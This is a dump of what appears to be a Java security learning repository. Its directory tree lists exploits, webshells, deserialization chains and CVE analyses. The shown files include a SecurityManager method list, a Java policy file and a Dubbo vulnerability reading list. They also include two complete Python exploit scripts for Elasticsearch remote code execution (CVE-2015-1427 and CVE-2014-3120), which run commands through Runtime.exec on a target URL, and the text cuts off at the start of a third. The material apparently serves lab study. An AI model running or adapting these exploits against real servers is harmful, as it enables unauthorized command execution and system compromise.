├── BypassSM ├── Readme.md ├── check.txt ├── learn │ ├── bypass_sm.jar │ └── eviljar │ │ ├── pom.xml │ │ ├── src │ │ └── main │ │ │ └── java │ │ │ └── bypass_sm.java │ │ └── target │ │ ├── classes │ │ └── bypass_sm.class │ │ ├── eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar │ │ ├── eviljar-1.0-SNAPSHOT.jar │ │ ├── maven-archiver │ │ └── pom.properties │ │ └── maven-status │ │ └── maven-compiler-plugin │ │ └── compile │ │ └── default-compile │ │ ├── createdFiles.lst │ │ └── inputFiles.lst └── policy │ └── custom.policy ├── Dubbo └── Readme.md ├── Elasticsearch ├── ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427) │ └── exp.py ├── ElasticSearch 命令执行漏洞(CVE-2014-3120) │ └── exp.py ├── ElasticSearch 插件目录穿越漏洞(CVE-2015-3337) │ └── exp.py ├── ElasticSearch 目录穿越漏洞(CVE-2015-5531) │ └── exp.py ├── Elasticsearch写入webshell漏洞(WooYun-2015-110216) │ └── exp.py └── README.md ├── JNI ├── Readme.md ├── jni.iml ├── jni │ ├── cmd.dll │ ├── jni.h │ ├── jni_md.h │ ├── org_javaweb_jni_CommandExecution.cpp │ ├── org_javaweb_jni_CommandExecution.h │ ├── webshell │ │ ├── jni.h │ │ ├── jni_md.h │ │ ├── libtest.dll │ │ ├── org_apache_jsp_test_jsp.h │ │ ├── org_apache_jsp_test_jsp_JniClass.c │ │ ├── org_apache_jsp_test_jsp_JniClass.h │ │ └── 命令.txt │ └── 命令.txt ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── org │ │ ├── apache │ │ └── jsp │ │ │ └── test_jsp.java │ │ └── javaweb │ │ └── jni │ │ ├── CommandExecution.java │ │ └── CommandExecutionTest.java ├── target │ └── classes │ │ └── org │ │ ├── apache │ │ └── jsp │ │ │ ├── test_jsp$JniClass.class │ │ │ └── test_jsp.class │ │ └── javaweb │ │ └── jni │ │ ├── CommandExecution.class │ │ ├── CommandExecutionTest$1.class │ │ └── CommandExecutionTest.class └── wz.txt ├── Jboss ├── CVE-2017-12149 │ ├── README.md │ └── image-20210401130731439.png ├── CVE-2017-7504 │ └── README.md ├── JMXInvokerServlet-deserialization │ └── README.md └── README.md ├── Jdbc ├── CVE-2021-2471 │ ├── Readme.md │ └── img │ │ ├── image-20211022135316052.png │ │ ├── image-20211022135425801.png │ │ ├── image-20211022140911655.png │ │ ├── image-20211022141357429.png │ │ ├── image-20211022141453082.png │ │ ├── image-20211022141712911.png │ │ ├── image-20211022142111106.png │ │ └── image-20211022142331574.png ├── Readme.md └── img │ ├── 1.png │ ├── 2.png │ └── Readme.md ├── Jenkins └── Readme.md ├── MyBatis └── Readme.md ├── RASP └── Readme.md ├── README.md ├── Shiro ├── CVE-2020-1957.pdf ├── README.md ├── Shiro权限绕过 │ ├── HELP.md │ ├── Readme.md │ ├── Shiro权限.iml │ ├── mvnw │ ├── mvnw.cmd │ ├── pom.xml │ ├── src │ │ └── main │ │ │ ├── java │ │ │ └── com │ │ │ │ └── shiro │ │ │ │ └── vuln │ │ │ │ ├── Controller │ │ │ │ └── UserController.java │ │ │ │ ├── Shiro │ │ │ │ ├── MainRealm.java │ │ │ │ └── ShiroConfig.java │ │ │ │ └── VulnApplication.java │ │ │ └── resources │ │ │ └── application.properties │ └── target │ │ └── classes │ │ ├── application.properties │ │ └── com │ │ └── shiro │ │ └── vuln │ │ ├── Controller │ │ └── UserController.class │ │ ├── Shiro │ │ ├── MainRealm.class │ │ └── ShiroConfig.class │ │ └── VulnApplication.class ├── shiro550 │ ├── HELP.md │ ├── cc11 │ ├── key.txt │ ├── mvnw │ ├── mvnw.cmd │ ├── payload │ ├── pom.xml │ ├── shiro550.iml │ ├── src │ │ ├── main │ │ │ ├── java │ │ │ │ └── com │ │ │ │ │ └── firebasky │ │ │ │ │ ├── Controller │ │ │ │ │ └── UserController.java │ │ │ │ │ ├── Shiro550Application.java │ │ │ │ │ ├── exp │ │ │ │ │ ├── AESencode.java │ │ │ │ │ ├── CommonCollection11.java │ │ │ │ │ ├── Main.java │ │ │ │ │ ├── ScanShiro.java │ │ │ │ │ └── exp.py │ │ │ │ │ └── shiro │ │ │ │ │ ├── MainRealm.java │ │ │ │ │ └── ShiroConfig.java │ │ │ └── resources │ │ │ │ └── application.properties │ │ └── test │ │ │ └── java │ │ │ └── com │ │ │ └── firebasky │ │ │ └── Shiro550ApplicationTests.java │ └── target │ │ ├── classes │ │ ├── application.properties │ │ └── com │ │ │ └── firebasky │ │ │ ├── Controller │ │ │ └── UserController.class │ │ │ ├── Shiro550Application.class │ │ │ ├── exp │ │ │ ├── AESencode.class │ │ │ ├── CommonCollection11.class │ │ │ ├── Main.class │ │ │ └── ScanShiro.class │ │ │ └── shiro │ │ │ ├── MainRealm.class │ │ │ └── ShiroConfig.class │ │ └── test-classes │ │ └── com │ │ └── firebasky │ │ └── Shiro550ApplicationTests.class └── shiro721 │ ├── HELP.md │ ├── mvnw │ ├── mvnw.cmd │ ├── pom.xml │ ├── shiro721.iml │ ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── firebasky │ │ │ │ └── shiro721 │ │ │ │ ├── Shiro721Application.java │ │ │ │ ├── config │ │ │ │ ├── MyRealm.java │ │ │ │ └── ShiroConfig.java │ │ │ │ ├── controllers │ │ │ │ ├── LoginController.java │ │ │ │ └── index.java │ │ │ │ └── exp │ │ │ │ ├── exp.py │ │ │ │ └── url.ser │ │ └── resources │ │ │ └── application.properties │ └── test │ │ └── java │ │ └── com │ │ └── firebasky │ │ └── shiro721 │ │ └── Shiro721ApplicationTests.java │ └── target │ ├── classes │ ├── application.properties │ └── com │ │ └── firebasky │ │ └── shiro721 │ │ ├── Shiro721Application.class │ │ ├── config │ │ ├── MyRealm.class │ │ └── ShiroConfig.class │ │ └── controllers │ │ ├── LoginController.class │ │ └── index.class │ └── test-classes │ └── com │ └── firebasky │ └── shiro721 │ └── Shiro721ApplicationTests.class ├── SnakeYaml ├── SnakeYaml.iml ├── pom.xml ├── src │ └── main │ │ └── java │ │ ├── CVE │ │ ├── PoC.java │ │ ├── gadget.java │ │ └── poc.txt │ │ ├── learn │ │ ├── Person.java │ │ ├── test.java │ │ └── 学习.txt │ │ └── trick │ │ └── SnakeYaml.java └── target │ └── classes │ ├── CVE │ ├── PoC.class │ └── gadget.class │ ├── learn │ ├── Person.class │ └── test.class │ └── trick │ └── SnakeYaml.class ├── Solr ├── Apache Solr 任意文件读取漏洞 │ ├── README.md │ └── apache solr未授权读文件exp.py └── README.md ├── Spring ├── CVE-2016-4977-spring │ ├── CVE-2016-4977.assets │ │ ├── image-20210219224825746.png │ │ ├── image-20210219224902858.png │ │ ├── image-20210219225556986.png │ │ ├── image-20210219225716796.png │ │ ├── image-20210219231451748.png │ │ ├── image-20210219231819148.png │ │ ├── image-20210219231847037.png │ │ ├── image-20210219232049395.png │ │ ├── image-20210219232204534.png │ │ ├── image-20210219232632661.png │ │ ├── image-20210219233138950.png │ │ ├── image-20210219233417903.png │ │ ├── image-20210220010536341.png │ │ ├── image-20210220010626981.png │ │ ├── image-20210220010854625.png │ │ ├── image-20210220010924079.png │ │ ├── image-20210220011027192.png │ │ ├── image-20210220011825279.png │ │ ├── image-20210220012116264.png │ │ ├── image-20210220012500083.png │ │ ├── image-20210220012822337.png │ │ ├── image-20210220013530679.png │ │ ├── image-20210220013647485.png │ │ ├── image-20210220013838006.png │ │ ├── image-20210220014127250.png │ │ ├── image-20210220014259943.png │ │ ├── image-20210220014620317.png │ │ └── image-20210220014702074.png │ ├── CVE-2016-4977.md │ ├── CVE-2016-4977.pdf │ └── cve-2016-4977 │ │ └── spring-oauth2-sec-bug │ │ ├── demo.iml │ │ ├── pom.xml │ │ ├── src │ │ └── main │ │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── DemoApplication.java │ │ │ └── resources │ │ │ └── application.properties │ │ └── target │ │ └── classes │ │ ├── application.properties │ │ └── com │ │ └── example │ │ └── DemoApplication.class ├── CVE-2017-4971-spring │ ├── CVE-2017-4971分析.assets │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 4.png │ │ ├── image-20210218194441152.png │ │ ├── image-20210218194733254.png │ │ ├── image-20210218200153046.png │ │ ├── image-20210218201238194.png │ │ ├── image-20210218201936295.png │ │ ├── image-20210218202011507.png │ │ ├── image-20210218202450134.png │ │ ├── image-20210218203221151.png │ │ ├── image-20210218203901093.png │ │ ├── image-20210218203953533.png │ │ ├── image-20210218204058653.png │ │ ├── image-20210218204423476.png │ │ ├── image-20210218204746269.png │ │ ├── image-20210218205407984.png │ │ ├── image-20210218205644634.png │ │ ├── image-20210218205752547.png │ │ ├── image-20210218210007792.png │ │ ├── image-20210218210058692.png │ │ ├── image-20210218210510086.png │ │ ├── image-20210218210700708.png │ │ ├── image-20210218210826600.png │ │ └── t01d4c3b8e8b53a2fba.png │ ├── CVE-2017-4971分析.md │ └── CVE-2017-4971分析.pdf ├── CVE-2017-8046-spring │ └── complete │ │ ├── CVE-2017-8046分析.assets │ │ ├── image-20210218140900669.png │ │ ├── image-20210218140952456.png │ │ ├── image-20210218141130874.png │ │ ├── image-20210218141757004.png │ │ ├── image-20210218141906222.png │ │ ├── image-20210218142031222.png │ │ ├── image-20210218142324101.png │ │ ├── image-20210218142345087.png │ │ ├── image-20210218142403072.png │ │ ├── image-20210218143536948.png │ │ ├── image-20210218143749562.png │ │ ├── image-20210218143913364.png │ │ ├── image-20210218144011160.png │ │ ├── image-20210218144046479.png │ │ ├── image-20210218144138429.png │ │ ├── image-20210218144321822.png │ │ ├── image-20210218144405693.png │ │ ├── image-20210218144455906.png │ │ ├── image-20210218154218728.png │ │ ├── image-20210218154242121.png │ │ ├── image-20210218154309595.png │ │ ├── image-20210218154343073.png │ │ ├── image-20210218154922515.png │ │ ├── image-20210218155012734.png │ │ ├── image-20210218155828334.png │ │ ├── image-20210218155904249.png │ │ ├── image-20210218155949892.png │ │ ├── image-20210218160152994.png │ │ ├── image-20210218160229390.png │ │ ├── image-20210218160352066.png │ │ ├── image-20210218160446520.png │ │ ├── image-20210218160527668.png │ │ └── image-20210218160715149.png │ │ ├── CVE-2017-8046分析.md │ │ ├── CVE-2017-8046分析.pdf │ │ ├── accessing-data-rest.iml │ │ ├── build.gradle │ │ ├── build │ │ ├── classes │ │ │ └── java │ │ │ │ ├── main │ │ │ │ ├── EZvulhub │ │ │ │ │ ├── Main.class │ │ │ │ │ └── SpELTest.class │ │ │ │ └── com │ │ │ │ │ └── example │ │ │ │ │ └── accessingdatarest │ │ │ │ │ ├── AccessingDataRestApplication.class │ │ │ │ │ ├── Person.class │ │ │ │ │ └── PersonRepository.class │ │ │ │ └── test │ │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── accessingdatarest │ │ │ │ └── AccessingDataRestApplicationTests.class │ │ └── tmp │ │ │ ├── compileJava │ │ │ └── source-classes-mapping.txt │ │ │ └── compileTestJava │ │ │ └── source-classes-mapping.txt │ │ ├── gradle │ │ └── wrapper │ │ │ ├── gradle-wrapper.jar │ │ │ └── gradle-wrapper.properties │ │ ├── gradlew │ │ ├── gradlew.bat │ │ ├── mvnw │ │ ├── mvnw.cmd │ │ ├── pom.xml │ │ ├── settings.gradle │ │ └── src │ │ ├── main │ │ └── java │ │ │ ├── EZvulhub │ │ │ ├── Main.java │ │ │ ├── SpELTest.java │ │ │ └── test.java │ │ │ └── com │ │ │ └── example │ │ │ └── accessingdatarest │ │ │ ├── AccessingDataRestApplication.java │ │ │ ├── Person.java │ │ │ └── PersonRepository.java │ │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── accessingdatarest │ │ └── AccessingDataRestApplicationTests.java ├── CVE-2018-1270-SPEL │ ├── CVE-2018-1270-master │ │ └── CVE-2018-1270-master │ │ │ ├── README.md │ │ │ ├── demo.iml │ │ │ ├── mvnw │ │ │ ├── mvnw.cmd │ │ │ ├── pom.xml │ │ │ └── src │ │ │ └── main │ │ │ └── java │ │ │ └── com │ │ │ └── venscor │ │ │ └── demo │ │ │ ├── Bean │ │ │ ├── Greeting.java │ │ │ └── HelloMessage.java │ │ │ ├── Controller │ │ │ └── GreetingController.java │ │ │ ├── SpringmessagespelApplication.java │ │ │ └── WebSocketConfig.java │ ├── CVE-2018-1270.pdf │ ├── Readme.md │ └── 分析.assets │ │ ├── 012A8071.png │ │ ├── 1.gif │ │ ├── image-20210220152220717.png │ │ ├── image-20210220154332152.png │ │ ├── image-20210220154922801.png │ │ ├── image-20210220160150498.png │ │ ├── image-20210220160459956.png │ │ ├── image-20210220161508697.png │ │ ├── image-20210220161825423.png │ │ ├── image-20210220161931650.png │ │ ├── image-20210220162251047.png │ │ └── 未命名-副本.gif ├── Readme.md └── spring-aop底层.pdf ├── Springboot └── Readme.md ├── Springcolud └── Readme.md ├── Struts2 ├── README.md ├── Struts2-001 │ ├── Struts001.java │ ├── Struts02-001简单分析.pdf │ ├── index.jsp │ ├── pom.xml │ ├── struts.xml │ └── web.xml ├── Struts2-002 │ ├── Struts02-002简单分析.pdf │ └── index.jsp ├── Struts2-004 │ └── README.md ├── Struts2-005 │ └── README.md ├── Struts2-007 │ ├── Struts007.java │ ├── Struts2-007简单分析.pdf │ ├── UserAction-validation.xml │ ├── index.jsp │ ├── struts.xml │ └── welcome.jsp ├── Struts2-008 │ └── README.md ├── Struts2-009 │ ├── 1.png │ └── README.md ├── Struts2-012 │ └── README.md ├── Struts2-013 │ └── README.md ├── Struts2-016 │ └── README.md ├── Struts2-045 │ └── README.md ├── Struts2-046 │ └── README.md └── img │ ├── README.md │ └── 环境.png ├── Weblogic ├── Readme.md └── img │ ├── image-20210815001234456.png │ ├── image-20210815103726507.png │ ├── image-20210815103750342.png │ ├── image-20210815110026954.png │ ├── image-20210815110029190.png │ └── image-20210815153940829.png ├── Xstream ├── Readme.md └── exp │ ├── CSRF │ └── CVE-2021-21349.xml │ ├── DOS │ ├── CVE-2017-7957.xml │ └── CVE-2021-21348.xml │ ├── RCE │ ├── CVE-2013-7285-2.xml │ ├── CVE-2013-7285.xml │ ├── CVE-2019-10173.xml │ ├── CVE-2020-26217.xml │ ├── CVE-2021-21344.xml │ ├── CVE-2021-21345.xml │ ├── CVE-2021-21346.xml │ ├── CVE-2021-21347.xml │ ├── CVE-2021-21350.xml │ ├── CVE-2021-21351.xml │ ├── CVE-2021-29505.xml │ ├── CVE-2021-39141.xml │ ├── CVE-2021-39144.xml │ └── CVE-2021-39146.xml │ └── XXE │ └── CVE-2016-3674.xml ├── jackson ├── inject.sql ├── jackson.iml ├── pom.xml ├── src │ └── main │ │ └── java │ │ └── com │ │ └── firebasky │ │ ├── cve │ │ ├── CVE_2019_12086.java │ │ ├── CVE_2019_12384.java │ │ ├── CVE_2019_12814.java │ │ ├── CVE_2019_14379.java │ │ ├── CVE_2019_14439.java │ │ ├── CVE_2020_35490.java │ │ ├── CVE_2020_36187.java │ │ └── 黑名单.txt │ │ ├── learn │ │ ├── Man.java │ │ ├── test.java │ │ └── test_poc.java │ │ └── self │ │ └── hikaricp.java ├── target │ └── classes │ │ └── com │ │ └── firebasky │ │ ├── cve │ │ ├── CVE_2019_12086.class │ │ ├── CVE_2019_12384.class │ │ ├── CVE_2019_12814.class │ │ ├── CVE_2019_14379.class │ │ ├── CVE_2019_14439.class │ │ ├── CVE_2020_35490.class │ │ └── CVE_2020_36187.class │ │ ├── learn │ │ ├── Man.class │ │ ├── test.class │ │ └── test_poc.class │ │ └── self │ │ └── hikaricp.class └── xxe │ ├── evil.dtd │ └── exp.xml ├── java-web ├── README.md ├── java安全之java-web.pdf └── java文件漏洞检查.md ├── java内存马 ├── Readme.md ├── Tomcat Filter │ ├── Readme.md │ └── Tomcat Filter.rar └── agent │ └── java-agent学习.pdf ├── java回显 ├── GlassFish │ └── Echo_Request.java ├── HELP.md ├── Readme.md ├── WildFly │ └── Echo_ServletRequestContext.java ├── java回显.iml ├── jetty │ └── Echo_HttpConnection.java ├── mvnw ├── mvnw.cmd ├── pom.xml ├── resin │ └── Echo_HttpRequest.java └── src │ ├── main │ ├── java │ │ └── com │ │ │ └── firebasky │ │ │ └── echo │ │ │ ├── EchoApplication.java │ │ │ ├── controller │ │ │ ├── Alltomcat.java │ │ │ ├── MBeanServer.java │ │ │ ├── Tomcat.java │ │ │ ├── demo.java │ │ │ ├── socket.java │ │ │ ├── socket_v2.java │ │ │ ├── springmvc.java │ │ │ └── webshell │ │ │ │ └── tomcat.java │ │ │ └── evilclass │ │ │ ├── springmvc.java │ │ │ ├── tomcat72.java │ │ │ ├── tomcat82.java │ │ │ ├── tomcat_v1.java │ │ │ ├── tomcat_v2.java │ │ │ ├── tomcat_v3.java │ │ │ └── webshell.java │ └── resources │ │ └── application.properties │ └── test │ └── java │ └── com │ └── firebasky │ └── echo │ └── EchoApplicationTests.java ├── java安全基础 ├── Java class文件格式.pdf ├── README.md ├── java内部类.pdf ├── java反射.pdf ├── java基础.pdf └── 反射newInstance的使用方式.md ├── java小型框架 ├── Readme.md ├── code │ └── CVE_2018_19178.java ├── img │ ├── CVE-2019-9615.png │ └── Readme.md ├── java代码审计之租车系统.pdf ├── java危险函数.md └── 代码审计基础.pdf ├── java序列化基础 ├── ClassLoader(类加载机制).pdf ├── Java反射机制2.pdf ├── README.md └── java反射机制.pdf ├── java序列化链 ├── AspectJWeaver │ └── AspectJWeaver.java ├── C3P0 │ ├── Readme.md │ └── payload1.java ├── Click │ └── payload.java ├── Clojure │ ├── Clojure.java │ └── SerializeUtil.java ├── CommonsBeanutils │ └── CommonsBeanutils1.java ├── FileUpload │ ├── FileUploadForCopy.java │ └── FileUploadForWrite.java ├── Groovy │ └── Groovy.java ├── Hibernate │ ├── Hibernate1.java │ └── Hibernate2.java ├── Java反序列化入门之URLDNS链.pdf ├── Mojarra │ └── Readme.md ├── README.md ├── ROME │ ├── Rome.java │ └── Rome2.java ├── Tools │ └── SerializeUtil.java ├── Vaadin │ └── Vaadin.java ├── spring │ ├── spring1.java │ └── spring2.java └── xmldecoder │ ├── Readme.md │ ├── exp1.xml │ ├── exp2.xml │ ├── exp3.xml │ └── main.java ├── java日常 ├── Readme.md ├── SPI机制.md ├── Thinking_in_java高级之volatile.md ├── img │ ├── image-20210818111820181.png │ ├── jep290.png │ ├── readobject.jpg │ ├── xxe.png │ └── 反射.png ├── java-fix序列化漏洞.md ├── java-maven打包学习.md ├── javabean与内省.md ├── java写文件rce.md ├── java协议.md ├── java反序列化编码绕过.md ├── java执行js导致命令执行.pdf ├── marshalsec.md ├── readobject深入.md ├── searchobj.md ├── wsdl.md ├── yso搭建.md ├── 反射newInstance的使用方式.md ├── 构造java探测class反序列化gadget的思考.md └── 闲谈log4j2.md ├── java模板注入 ├── Beetl │ └── exp.txt ├── FreeMarker │ └── exp.txt ├── Readme.md ├── Thymeleaf │ └── exp.txt ├── Velocity │ ├── exp.txt │ └── pom.xml ├── exp.txt └── jsp │ └── test.jsp ├── java面向对象练习一.pdf ├── jndi-gadgets.md ├── shell ├── EL │ └── test.java ├── Elasticsearch_MVEL │ ├── demo.java │ └── pom.xml ├── Expression │ ├── test.java │ └── test.jsp ├── JNDI │ └── test.java ├── JNI │ ├── CommandExecution.java │ └── test.jsp ├── Jexl │ ├── demo.java │ └── pom.xml ├── Jshell │ └── test.java ├── OGNL │ ├── Readme.md │ ├── demo.java │ └── pom.xml ├── Readme.md ├── SPEL │ └── Readme.md ├── ScriptEngineManager │ ├── Readme.md │ ├── java-scripting-programmers-guide.pdf │ ├── main.java │ ├── shell.jsp │ ├── shell2.jsp │ └── test.java ├── bypass │ ├── servertableentry.java │ ├── test.java │ ├── test2.java │ ├── test3.java │ └── test4.java ├── jndi │ ├── client.jsp │ └── yso.txt ├── jrmp │ ├── client.jsp │ └── exp.txt ├── loadjar │ ├── Evil.java │ └── server.jsp └── rmi-registry-bind │ ├── server.jsp │ └── yso.txt ├── spring-bug ├── CVE-2016-4977.pdf ├── CVE-2017-4971分析.pdf ├── CVE-2017-8046分析.pdf ├── CVE-2018-1270.pdf └── README.md └── tomcat ├── CVE-2017-12615Tomcat远程代码执行漏洞 ├── README.md └── exp.py ├── CVE-2019-0232 Apache Tomcat远程代码执行漏洞 └── README.md ├── CVE-2020-13942 Apache Unomi 远程代码执行漏洞 ├── CVE-2020-13942-exp.py └── README.md ├── CVE-2020-1938文件包含漏洞 ├── CVE-2020-1938-exp.py └── README.md ├── README.md ├── Tomcat后台弱口令漏洞 ├── README.md ├── shell.jsp └── shell.war └── img ├── 1.png └── README.md /BypassSM/check.txt: -------------------------------------------------------------------------------- 1 | checkAccept(String, int) 2 | checkAccess(Thread) 3 | checkAccess(ThreadGroup) 4 | checkAwtEventQueueAccess() 5 | checkConnect(String, int) 6 | checkConnect(String, int, Object) 7 | checkCreateClassLoader() 8 | checkDelete(String) 9 | checkExec(String) 10 | checkExit(int) 11 | checkLink(String) 12 | checkListen(int) 13 | checkMemberAccess(Class, int) 14 | checkMulticast(InetAddress) 15 | checkMulticast(InetAddress, byte) 16 | checkPackageAccess(String) 17 | checkPackageDefinition(String) 18 | checkPermission(Permission) 19 | checkPermission(Permission, Object) 20 | checkPrintJobAccess() 21 | checkPropertiesAccess() 22 | checkPropertyAccess(String) 23 | checkRead(FileDescriptor) 24 | checkRead(String) 25 | checkRead(String, Object) 26 | checkSecurityAccess(String) 27 | checkSetFactory() 28 | checkSystemClipboardAccess() 29 | checkTopLevelWindow(Object) 30 | checkWrite(FileDescriptor) 31 | checkWrite(String) -------------------------------------------------------------------------------- /BypassSM/learn/bypass_sm.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/BypassSM/learn/bypass_sm.jar -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | learn 7 | org.example 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | eviljar 13 | 14 | 15 | 8 16 | 8 17 | 18 | 19 | 20 | 21 | org.apache.maven.plugins 22 | maven-assembly-plugin 23 | 2.5.5 24 | 25 | 26 | 27 | ErrorBaseExec 28 | 29 | 30 | 31 | jar-with-dependencies 32 | 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/classes/bypass_sm.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/BypassSM/learn/eviljar/target/classes/bypass_sm.class -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT.jar -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | #Generated by Maven 2 | #Wed Oct 20 19:27:56 CST 2021 3 | version=1.0-SNAPSHOT 4 | groupId=org.example 5 | artifactId=eviljar 6 | -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | bypass_sm.class 2 | -------------------------------------------------------------------------------- /BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst -------------------------------------------------------------------------------- /BypassSM/policy/custom.policy: -------------------------------------------------------------------------------- 1 | grant { 2 | permission java.io.FilePermission "D:\\*", "read"; 3 | permission java.net.SocketPermission "www.baidu.com:1-", "connect,resolve"; 4 | }; -------------------------------------------------------------------------------- /Dubbo/Readme.md: -------------------------------------------------------------------------------- 1 | # Dubbo 2 | 3 | >Apache Dubbo 是伪装的、轻量级的Java RPC 服务框架。[RPC服务](https://www.zhihu.com/question/25536695) 4 | >[默认反序列化利用之hessian2](https://www.anquanke.com/post/id/197658) 5 | 6 | ### CVE-2019-17564 7 | >spring (spring-web(5.1.9.RELEASE)) 的httpinvoker 可能存在反序列化漏洞 [docs](https://docs.spring.io/spring-framework/docs/5.1.0.RELEASE/spring-framework-reference/integration.html#remoting-httpinvoker) 8 | 9 | http://www.lmxspace.com/2020/02/16/Apache-Dubbo%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2019-17564%EF%BC%89/ 10 | 11 | https://www.mi1k7ea.com/2021/07/03/%E6%B5%85%E6%9E%90Dubbo-HttpInvokerServiceExporter%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2019-17564%EF%BC%89/ 12 | 13 | ### CVE-2021-25641 14 | >Dubbo Provider即服务提供方默认使用dubbo协议来进行RPC通信,而dubbo协议默认是使用Hessian2序列化格式进行对象传输的,不过可以通过更改dubbo协议的第三个flag位字节来更改为使用Kryo或FST序列化格式来进行Dubbo Provider反序列化攻击从而绕过针对Hessian2反序列化相关的限制来达到RCE。 15 | 16 | https://www.mi1k7ea.com/2021/06/30/%E6%B5%85%E6%9E%90Dubbo-KryoFST%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2021-25641%EF%BC%89/ 17 | 18 | ~~可以整理一个fastjson利用gadget~~ 19 | 20 | ### CVE-2021-30179 21 | 22 | https://mp.weixin.qq.com/s/vHJpE2fZ8Lne-xFggoQiAg 23 | 24 | **个人认为CVE-2021-30179的主要思路就是Apache Dubbo在处理泛类引用时,提供了多种通过反序列化方式得到对象再生成pojo对象的选择。** 三梦师傅说跟这个思路扩大了反序列化挖掘思路 25 | 26 | ### Dubbo反序列化RCE利用之新拓展面 - Dubbo Rouge攻击客户端 27 | 28 | https://xz.aliyun.com/t/7354 29 | 30 | **文章中有一点非常强** 31 | ![image](https://user-images.githubusercontent.com/63966847/139078049-28694796-bb21-40fe-9e8d-38d96da29ab8.png) 32 | -------------------------------------------------------------------------------- /Elasticsearch/ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)/exp.py: -------------------------------------------------------------------------------- 1 | #@author Firbasky 2 | #参考https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-1427 3 | import requests 4 | import json 5 | import urllib3 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | #解决ssl链接报错 9 | 10 | """ 11 | 本漏洞:1.是一个沙盒绕过;2.是一个Goovy代码执行漏洞。 12 | """ 13 | 14 | url = "http://ip" 15 | 16 | add = { 17 | "name": "Firebasky" 18 | } 19 | 20 | exp ={ 21 | "size":1, "script_fields": 22 | { 23 | "lupin": 24 | { 25 | "lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()" 26 | } 27 | } 28 | } 29 | 30 | add = json.dumps(add) 31 | exp = json.dumps(exp) 32 | headers = {"Content-type": "application/json","Accept": "*/*"} 33 | #需要添加一条数据 34 | requests.request("POST",url=url+"/website/blog/",data=add,verify=False,headers=headers) 35 | #执行命令 36 | r=requests.request("POST",url=url+"/_search?pretty",verify=False,data=exp,headers=headers) 37 | print(r.text) 38 | -------------------------------------------------------------------------------- /Elasticsearch/ElasticSearch 命令执行漏洞(CVE-2014-3120)/exp.py: -------------------------------------------------------------------------------- 1 | #@author Firbasky 2 | #参考https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 3 | import requests 4 | import json 5 | import urllib3 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | #解决ssl链接报错 9 | 10 | """ 11 | 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作, 12 | 而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 13 | 14 | 影响版本:ElasticSearch 1.2之前的版本 15 | """ 16 | 17 | url = "http://ip" 18 | 19 | add = { 20 | "name": "Firebasky" 21 | } 22 | exp = { 23 | "size": 1, 24 | "query": { 25 | "filtered": { 26 | "query": { 27 | "match_all": { 28 | } 29 | } 30 | } 31 | }, 32 | "script_fields": { 33 | "command": { 34 | "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();" 35 | } 36 | } 37 | } 38 | 39 | add = json.dumps(add) 40 | exp = json.dumps(exp) 41 | headers = {"Content-type": "application/json","Accept": "*/*"} 42 | #需要添加一条数据 43 | requests.request("POST",url=url+"/website/blog/",data=add,verify=False,headers=headers) 44 | #执行命令 45 | r=requests.request("POST",url=url+"/_search?pretty",verify=False,data=exp,headers=headers) 46 | print(r.text) 47 | -------------------------------------------------------------------------------- /Elasticsearch/ElasticSearch 插件目录穿越漏洞(CVE-2015-3337)/exp.py: -------------------------------------------------------------------------------- 1 | #@author Firbasky 2 | #参考https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337 